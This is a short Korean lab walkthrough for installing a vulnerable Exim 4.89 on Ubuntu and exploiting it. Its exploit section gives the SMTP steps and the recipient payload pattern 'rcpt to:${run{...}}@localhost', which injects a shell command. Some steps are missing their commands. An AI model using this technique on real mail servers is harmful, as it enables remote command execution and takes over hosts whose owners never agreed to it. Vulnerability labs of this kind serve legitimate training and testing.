
취약한 Exim 버전 설치 및 악용 지침
취약한 버전의 Exim 설치 및 그 익스플로잇에 대한 지침 테스트 환경: Linux Ubuntu 16.04, Exim 4.89
Exim 4.89 다운로드 및 압축 해제
압축 해제된 폴더로 이동
필요한 설정 파일 복사 및 수정
sed -e 's,^EXIM_USER. * $,EXIM_USER=exim,' Local/Makefile src/EDITME > Local/Makefile
cp exim_monitor/EDITME Local/eximon.conf
exim 사용자 및 그룹 생성
sudo groupadd -g 31 exim
sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim
의존성 설치
Exim 4.89 설치
7일을 기다리지 않고 익스플로잇을 수행할 수 있도록 /usr/exim/configure를 편집하여 릴레이를 허용
Exim을 exim 사용자로 실행
셸 명령어를 16진수로 변환. 예시:
예제 표:
먼저 nc를 사용하여 서버에 연결합니다.
연결 후 HELO를 보냅니다.
다음으로 발신자 주소를 비워둡니다.
그런 다음 생략 부호(...) 대신 원하는 명령을 삽입하여 페이로드가 포함된 수신자 주소를 설정합니다. rcpt to:${run{...}}@localhost.
마지막으로 DATA를 입력한 후 31줄, 빈 줄, 마침표를 입력합니다.